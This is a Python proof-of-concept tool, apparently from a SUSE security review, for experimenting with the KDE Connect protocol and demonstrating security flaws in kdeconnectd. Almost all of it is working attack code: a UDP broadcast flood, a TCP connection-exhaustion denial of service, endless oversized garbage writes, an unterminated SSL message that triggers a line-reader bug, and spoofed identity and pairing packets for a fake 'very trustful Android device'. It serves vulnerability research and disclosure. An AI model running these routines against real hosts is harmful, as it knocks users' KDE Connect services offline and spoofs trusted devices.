#!/usr/bin/python3
# -*- coding: utf-8 -*-
# vim: ts=4 et sw=4 sts=4 :

# Author: Matthias Gerstner
#
# Small testing tool to experiment with the kdeconnect protocol and to
# demonstrate security issues in the kdeconnectd implementation.
#
# You need a fairly recent Python3 interpreter and the PyQt5 python-qt
# bindings to run this script.
#
# Two sets of SSL certificates are already included with this script. You can
# quickly generate a new one using the openssl command line utility and the
# accompanied `create_cert.sh` wrapper script. Keep in mind that kdeconnectd
# requires the CN (Common Name) to match the deviceid transmitted in the
# kdeconnect.identity message. This check is only made the first time an SSL
# connection is established AFTER a pairing is performed.
#
# Also keep in mind that you might need to open related ports in the firewall
# of the involved hosts.
#
# All of this source code is license under:
#
# ISC License
#
# Copyright (c) 2020, SUSE LLC
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import socket
import os
import sys
import pprint
import json
import argparse
import signal
import pathlib

# use the QSslSocket to be compatible with the kdeconnect protocol that starts
# unencrypted and only later initiates an SSL handshake.
from PyQt5.QtNetwork import QSslSocket, QSslCipher, QSslConfiguration, QSslError, QTcpServer, QHostAddress
from PyQt5.QtCore import QCoreApplication

def fprint(*args, **kwargs):
    print(*args, **kwargs)
    sys.stdout.flush()

PORT = 1716
LOCAL_TCP_PORT = 1025
PEER = '10.160.67.85'

OUR_DIR = pathlib.Path(__file__).parent
PRIVKEY = OUR_DIR / "certs/privateKey.pem"
LOCALCERT = OUR_DIR / "certs/certificate.pem"
DEVICEID = "_ed5ad7ad_42d1_4b4b_ae3a_5b5af224a513_"

parser = argparse.ArgumentParser(description = "Tool to interact and experiment with 'kdeconnectd'")
parser.add_argument("--receive-bcast", action='store_true')
parser.add_argument("--send-bcast", type=str, nargs='?', const = PEER)
parser.add_argument("--listen-tcp", type=str, nargs='?', const = "0.0.0.0")
parser.add_argument("--local-tcp-port", type=int, default = LOCAL_TCP_PORT)
parser.add_argument("--connect-tcp", type=str, nargs='?', const = PEER)
parser.add_argument("--perform-tcp-connect-DoS", type=str, nargs='?', const = PEER)
parser.add_argument("--privkey", type=pathlib.Path, default = PRIVKEY)
parser.add_argument("--localcert", type=pathlib.Path, default = LOCALCERT)
parser.add_argument("--deviceid", type=str, default = DEVICEID)
parser.add_argument("--devicename", type=str, default = "very trustful Android device")
parser.add_argument("--broadcast-DoS", action = 'store_true')
parser.add_argument("--verbose", action='store_true')
parser.add_argument("--send-overlong-tcp-message", action='store_true')
parser.add_argument("--send-unterminated-ssl-message", action='store_true')


# this is one big hack to support getting a QSslSocket out of a QTcpServer. In
# C++ a qobject_cast() is used to achieve this. This seems not to be available
# in PyQt5. Instead We derive from QTcpServer and override
# incomingConnection() to create a QSslSocket right away.
class QSslServer(QTcpServer):

    def __init__(self):

        super().__init__()
        self.m_conn = None

    def incomingConnection(self, desc):
        # store this as a member variable to avoid the Python garbage
        # collection to kick in. Won't work for more than one parallel
        # connection
        if self.m_conn:
            fprint("WARNING: follow-up connection detected, dropped!")
            os.close(desc)
            return
        self.m_conn = QSslSocket()
        self.m_conn.setSocketDescriptor(desc)
        self.addPendingConnection(self.m_conn)


def getUDPBroadcastSocket():

    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
    udp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
    udp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    udp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    return udp_socket

class KdeCommunicator(QCoreApplication):

    def __init__(self):
        super().__init__([])
        self.m_qsocket = None
        self.m_qserver = None
        self.m_encrypted = False
        self.m_args = parser.parse_args()
        self.checkArgs()

    def checkArgs(self):
        for fl in (self.m_args.localcert, self.m_args.privkey):
            if os.path.exists(fl):
                continue

            raise Exception("Missing certificate/key file: " + fl)

    def trace(self, label, data):
        data = json.loads(data)
        pprint.pprint(label)
        pprint.pprint(data)

    def getIdentityPacket(self):
        ret = '''{{
            "body": {{
                "tcpPort": {local_tcp_port},
                "protocolVersion": 7,
                "deviceId": "{deviceid}",
                "deviceName": "{devicename}"
            }},
            "type": "kdeconnect.identity"
        }}'''

        ret = ret.format(
            local_tcp_port = self.m_args.local_tcp_port,
            devicename = self.m_args.devicename,
            deviceid = self.m_args.deviceid
        )

        if self.m_args.verbose:
            self.trace("Using identity packet:", ret)

        # kdeconnectd reads only one line here
        return ret.replace('\n', '').encode()

    def getPairingRequest(self):
        ret = '''{{
            "body": {{
                "deviceId": "{deviceid}",
                "pair": true
            }},
            "type": "kdeconnect.pair"
        }}'''.replace('\n', '') + '\n'

        ret = ret.format(
            deviceid = self.m_args.deviceid
        )

        if self.m_args.verbose:
            self.trace("Using pairing packet:", ret)

        # this packet requires a newline at the end, otherwise
        # kdeconnectd ends up in an infinite loop
        return (ret.replace('\n', '') + '\n').encode()

    def configureSslSocket(self, socket):
        ciphers = (
            "ECDHE-ECDSA-AES256-GCM-SHA384",
            "ECDHE-ECDSA-AES128-GCM-SHA256",
            "ECDHE-RSA-AES128-SHA",
        )
        #print("Supported ciphers", '\n'.join([c.name() for c in socket.supportedCiphers()]))

        fprint("Using cert and private key from",
                self.m_args.localcert, self.m_args.privkey)
        socket.setPrivateKey(str(self.m_args.privkey))
        socket.setLocalCertificate(str(self.m_args.localcert))
        socket.setPeerVerifyMode(QSslSocket.QueryPeer)
        socket.setCiphers(':'.join(ciphers))

        socket.error.connect(self._errorOccured)
        socket.sslErrors.connect(self._sslErrorOccured)
        socket.readyRead.connect(self._newData)
        socket.disconnected.connect(self._disconnected)
        socket.connected.connect(self._connected)
        socket.encrypted.connect(self._encrypted)

    def queryPairing(self):

        while True:
            fprint("Do you want to (re-)pair? (y/n)")
            answer = sys.stdin.readline()
            if not answer:
                return
            elif answer.strip() in ('yes', 'y'):
                self.sendPairing()
                break
            elif answer.strip() in ('no', 'n'):
                fprint("Not (re-)pairing")
                break

    def initiateSsl(self, socket):
        fprint("Initiating SSL exchange")
        if self.m_encrypted:
            fprint("Already encrypted!")
            return

        if self.m_qserver:
            socket.startClientEncryption()
        else:
            socket.startServerEncryption()

    def _encrypted(self):
        cipher = self.m_qsocket.sessionCipher()
        fprint("SSL session established with cipher", cipher.name(), "key exchange method:", cipher.keyExchangeMethod())
        self.m_encrypted = True

        if self.m_args.send_unterminated_ssl_message:
            # SocketLineReader contains a bug regarding messages not
            # terminated with a newline
            fprint("Writing non-newline terminated message to SocketLineReader")
            self.m_qsocket.write(b"{message without newline}")
            self.m_qsocket.waitForBytesWritten()
        elif not self.m_qserver:
            self.queryPairing()

    def _connected(self):
        fprint("TCP connection established")
        if self.m_args.send_overlong_tcp_message:
            count = 0
            while True:
                count += 1
                if count % 50 == 0:
                    fprint("Wrote", count, "chunks")
                self.m_qsocket.write(b"{some garbage stuff}" * 1024)
                self.m_qsocket.waitForBytesWritten()
        else:
            self.sendIdentity()
            self.initiateSsl(self.m_qsocket)

    def _disconnected(self):
        fprint("TCP connection lost")
        self.quit()

    def _errorOccured(self):
        print("error occured", self.m_qsocket.errorString())
        sys.stdout.flush()
        sys.exit(1)

    def _sslErrorOccured(self):
        for error in self.m_qsocket.sslErrors():
            if error.error() == QSslError.SelfSignedCertificate:
                print("Peer has untrusted, self-signed certificate")
            else:
                print("SSL error occured:", error.error(), error.errorString())

    def _newData(self):
        try:
            fprint("New data")
            while True:
                data = self.m_qsocket.read(8192)
                if not data:
                    print("EOD")
                    break
                data = data.decode('utf8')
                for line in data.splitlines():
                    self.newLine(line)

            if self.m_qserver and not self.m_encrypted:
                # if this was an incoming connection the
                # establish an SSL exchange now
                self.initiateSsl(self.m_qsocket)
        except Exception as e:
            print("Failed to process new data:", e)

    def newLine(self, line):
        j = json.loads(line)
        pprint.pprint(j)
        print()

    def sendPairing(self):
        self.m_qsocket.write(self.getPairingRequest())
        self.m_qsocket.waitForBytesWritten()
        fprint("wrote pairing packet")

    def run(self):
        if self.m_args.receive_bcast:
            self.receiveBcast()
        elif self.m_args.send_bcast:
            self.sendBcast()
        elif self.m_args.listen_tcp:
            self.listenTcp()
        elif self.m_args.connect_tcp:
            self.connectTcp()
        elif self.m_args.perform_tcp_connect_DoS:
            self.performTcpConnectDos()
        else:
            print("nothing to do.")

    def receiveBcast(self):
        udp_socket = getUDPBroadcastSocket()
        udp_socket.bind(("0.0.0.0", PORT))

        print("Listening for UDP broadcast messages on port", PORT)
        print()
        print("Press Ctrl-C to abort")
        fprint()

        while True:
            msg = udp_socket.recv(8192)
            print("Received broadcast message of", len(msg), "bytes")
            print("-" * 80)
            data = msg.decode('utf8')
            j = json.loads(data)
            pprint.pprint(j)
            fprint()

    def sendBcast(self):
        udp_socket = getUDPBroadcastSocket()
        udp_socket.connect((self.m_args.send_bcast, PORT))
        udp_socket.send(self.getIdentityPacket())
        while self.m_args.broadcast_DoS:
            udp_socket.send(self.getIdentityPacket())

    def _newTcpConnection(self):

        fprint("Got new connection\n")
        # for simplicity only process the first connection, ignore any
        # later ones
        if self.m_qsocket:
            fprint("Follow-up connection, ignored!\n")
            return
        self.m_qsocket = self.m_qserver.nextPendingConnection()
        self.configureSslSocket(self.m_qsocket)

    def listenTcp(self):
        fprint("Waiting for incoming TCP connections")
        self.m_qserver = QSslServer()
        self.m_qserver.newConnection.connect(self._newTcpConnection)
        self.m_qserver.listen(QHostAddress("0.0.0.0"), self.m_args.local_tcp_port)

        # process the Qt event loop for being able to receive signals
        self.startEventLoop()

    def sendIdentity(self):
        fprint("Sending identity packet")
        self.m_qsocket.write(self.getIdentityPacket())
        self.m_qsocket.waitForBytesWritten()

    def connectTcp(self):
        host, port = self.m_args.connect_tcp, PORT
        fprint("Attemping outgoing TCP connection to", ':'.join((host, str(port))))

        self.m_qsocket = QSslSocket()
        self.configureSslSocket(self.m_qsocket)
        self.m_qsocket.connectToHost(host, PORT)

        self.startEventLoop()

    def performTcpConnectDos(self):
        host, port = self.m_args.perform_tcp_connect_DoS, PORT
        fprint("Performing TCP connect DoS")

        socketlist = []

        while True:
            qs = QSslSocket()
            self.configureSslSocket(qs)
            qs.connectToHost(host, PORT)

            socketlist.append(qs)

            if len(socketlist) % 50 == 0:
                fprint(len(socketlist), "connections open")

            if len(socketlist) > 1015:
                break

        fprint("Stopping with", len(socketlist), "open connections")
        stuff = sys.stdin.readline()


    def startEventLoop(self):
        # when the Qt event loop runs then regular ctrl-c doesn't work any more.
        #
        # work around by installing a default signal handler
        signal.signal(signal.SIGINT, signal.SIG_DFL)
        fprint("Entering event loop processing")
        self.exec()


c = KdeCommunicator()
c.run()

